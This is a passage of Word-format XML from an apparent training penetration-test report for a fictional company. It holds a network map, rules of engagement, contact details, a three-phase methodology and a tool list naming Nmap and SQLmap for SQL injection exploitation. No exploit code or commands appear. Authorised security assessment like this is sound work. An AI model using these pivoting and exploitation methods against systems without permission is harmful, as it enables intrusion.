              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="039BE5"/>
          </w:tcPr>
          <w:p w14:paraId="279EFC73" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="039BE5"/>
          </w:tcPr>
          <w:p w14:paraId="19478692" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Note</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="3E8C430E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="115"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4579" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AFAC566" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>Eth0: 10.10.0.66</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4780"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173BA7D" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0FC61E7C" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>nbnwebserver</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="3B62ABC7" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="114"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4579" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25F538EB" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>Eth1: 172.16.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4780" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B955820" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00220DD3" w14:paraId="5D241DA7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4579" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5364B733" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>Eth1: 172.16.1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59D50B6C" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>nbnclient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D926D54" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C0220A0" w14:textId="1B45DF3E" w:rsidR="001F74D3" w:rsidRPr="001F74D3" w:rsidRDefault="001F74D3" w:rsidP="001F74D3">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Provided Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D0D57A" w14:textId="2B203F60" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:r>
        <w:t xml:space="preserve">NBN Corp have not provided </w:t>
      </w:r>
      <w:r w:rsidR="001F74D3">
        <w:t>NetArmor Pentesters</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with any system access or credentials.</w:t>
      </w:r>
      <w:r w:rsidR="001F74D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509AA7A6" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3"/>
    <w:p w14:paraId="712F2446" w14:textId="5AB5EF6C" w:rsidR="00DB4D1D" w:rsidRPr="001F74D3" w:rsidRDefault="00DB4D1D" w:rsidP="00DB4D1D">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_kfuezk755tht"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Rules of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492E39EE" w14:textId="4CE20D49" w:rsidR="00220DD3" w:rsidRDefault="001F74D3" w:rsidP="001F74D3">
      <w:r>
        <w:t>NetArmor Pentesters will not attack the internal client directly and must pivot through the webserver. NetArmor Pentesters is not allowed to change any system passwords, configurations, or install software. Denial of service attacks are outside the scope of the security assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4F20D1" w14:textId="77777777" w:rsidR="00C65FED" w:rsidRDefault="00C65FED" w:rsidP="001F74D3"/>
    <w:p w14:paraId="02D7FB67" w14:textId="77777777" w:rsidR="000C13F1" w:rsidRDefault="000C13F1" w:rsidP="001F74D3"/>
    <w:p w14:paraId="16483084" w14:textId="77777777" w:rsidR="000C13F1" w:rsidRDefault="000C13F1" w:rsidP="001F74D3"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="94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3"/>
        <w:gridCol w:w="4567"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C65FED" w14:paraId="1EDCB311" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:trHeight w:val="1628"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D8C4B32" w14:textId="234D7C64" w:rsidR="00C65FED" w:rsidRPr="001F74D3" w:rsidRDefault="00C65FED" w:rsidP="00C65FED">
            <w:pPr>
              <w:spacing w:before="200"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Point of Contact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C51283A" w14:textId="77777777" w:rsidR="00C65FED" w:rsidRPr="00DB4D1D" w:rsidRDefault="00C65FED" w:rsidP="00DB268A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="548DD4" w:themeColor="text2" w:themeTint="99"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7080F8FB" w14:textId="2715804A" w:rsidR="00C65FED" w:rsidRDefault="00C65FED" w:rsidP="00C65FED">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00A74F8C">
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
                <w:noProof/>
                <w:color w:val="009DDC"/>
                <w:sz w:val="72"/>
                <w:szCs w:val="72"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EE76B8C" wp14:editId="1BC67000">
                  <wp:extent cx="1526876" cy="950463"/>
                  <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                  <wp:docPr id="374991090" name="Picture 374991090" descr="A person with a mask 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69746" name="Picture 1" descr="A person with a mask on&#10;&#10;Description automatically generated"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId8"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1544749" cy="961589"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C65FED" w14:paraId="7DAD8E16" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:trPr>
          <w:trHeight w:val="404"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="441B4C7E" w14:textId="76CCF7CE" w:rsidR="00C65FED" w:rsidRPr="00C65FED" w:rsidRDefault="00C65FED" w:rsidP="00DB268A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="548DD4" w:themeColor="text2" w:themeTint="99"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB4D1D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="548DD4" w:themeColor="text2" w:themeTint="99"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>NetArmor Pentesters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66524853" w14:textId="0BE8F7BE" w:rsidR="00C65FED" w:rsidRDefault="00C65FED" w:rsidP="00DB268A">
            <w:r>
              <w:t>Tel:  +1 (555) 123-4567</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C65FED" w14:paraId="366D7654" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BD2B061" w14:textId="2B2F65FF" w:rsidR="00C65FED" w:rsidRPr="00C65FED" w:rsidRDefault="00C65FED" w:rsidP="00DB268A">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>555 Apple Street</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CC54177" w14:textId="7DF457AF" w:rsidR="00C65FED" w:rsidRDefault="00C65FED" w:rsidP="00DB268A">
            <w:r>
              <w:t>Fax: +1 (555) 456-1234</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C65FED" w14:paraId="06FAE435" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20615759" w14:textId="47E720A9" w:rsidR="00C65FED" w:rsidRDefault="00C65FED" w:rsidP="00DB268A">
            <w:r>
              <w:t>Suite B #2543</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5160BB36" w14:textId="4696AB92" w:rsidR="00C65FED" w:rsidRDefault="00C65FED" w:rsidP="00DB268A">
            <w:r>
              <w:t xml:space="preserve">Email: </w:t>
            </w:r>
            <w:hyperlink r:id="rId10" w:history="1">
              <w:r w:rsidRPr="009539AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>info@netarmor.com</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C65FED" w14:paraId="19C5B007" w14:textId="77777777" w:rsidTr="1D8F7EFF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4873" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="621173B5" w14:textId="566073A2" w:rsidR="00C65FED" w:rsidRDefault="00C65FED" w:rsidP="00DB268A">
            <w:r>
              <w:t>Brooklyn, NY, 11230</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5290D845" w14:textId="0321676F" w:rsidR="00C65FED" w:rsidRDefault="00C65FED" w:rsidP="00DB268A">
            <w:r>
              <w:t>Web: https://www.netarmor.pentesting.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D713748" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00B41A85">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc153834523"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>TESTING METHODOLOGY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="4B627423" w14:textId="02F9586F" w:rsidR="00220DD3" w:rsidRDefault="6666EA25">
      <w:r>
        <w:t xml:space="preserve">NetArmor’s testing methodology was split into three phases: </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Target Assessment</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidR="5F0928B7" w:rsidRPr="1D8F7EFF">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Actions of Objectives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="5F0928B7">
        <w:t>During reconnaissance, we gathered information about NBN’s network systems.</w:t>
      </w:r>
      <w:r w:rsidR="33C188A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5F0928B7">
        <w:t xml:space="preserve">NetArmor used port scanning and other enumeration methods to refine target information and assess target values. Next, we conducted our targeted assessment. NetArmor simulated an attacker exploiting vulnerabilities in the NBN network. </w:t>
      </w:r>
      <w:r w:rsidR="5C1C4499">
        <w:t xml:space="preserve">NetArmor </w:t>
      </w:r>
      <w:r w:rsidR="5F0928B7">
        <w:t xml:space="preserve">gathered evidence of vulnerabilities during this phase of the engagement while </w:t>
      </w:r>
      <w:r w:rsidR="5C1C4499">
        <w:t xml:space="preserve">carefully </w:t>
      </w:r>
      <w:r w:rsidR="6454D1E7">
        <w:t>following the rules of engagement. For Actions of Objections, NetArmor prioritized finding flags and other sensitive company information. Forensic work was also done in this phase to identify any trace of bad actors attacking the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAEDE1D" w14:textId="77777777" w:rsidR="00294FAB" w:rsidRDefault="00294FAB"/>
    <w:p w14:paraId="1D586EBC" w14:textId="2E7E2101" w:rsidR="00294FAB" w:rsidRDefault="6454D1E7">
      <w:r>
        <w:t>Tools used for the penetration test include:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10070" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2985"/>
        <w:gridCol w:w="7085"/>
      </w:tblGrid>
      <w:tr w:rsidR="1D8F7EFF" w14:paraId="2805C07A" w14:textId="77777777" w:rsidTr="00B94233">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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39BE5"/>
          </w:tcPr>
          <w:p w14:paraId="41839F5A" w14:textId="77777777" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>TOOL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="70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39BE5"/>
          </w:tcPr>
          <w:p w14:paraId="2D0D350D" w14:textId="77777777" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>DESCRIPTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="1D8F7EFF" w14:paraId="75E1F522" w14:textId="77777777" w:rsidTr="00B94233">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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A690257" w14:textId="77777777" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="70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77AB61A" w14:textId="77777777" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>Used for scanning ports on hosts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="1D8F7EFF" w14:paraId="7DCE5A97" w14:textId="77777777" w:rsidTr="00B94233">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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55DD6F4" w14:textId="42548B5D" w:rsidR="5331645B" w:rsidRDefault="5331645B" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SQLmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="70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50CB354" w14:textId="6E31D216" w:rsidR="1D8F7EFF" w:rsidRDefault="1D8F7EFF" w:rsidP="1D8F7EFF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t xml:space="preserve">Used to </w:t>
            </w:r>
            <w:r w:rsidR="771DADE0" w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
              </w:rPr>
              <w:t>automate the exploitation of SQL injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
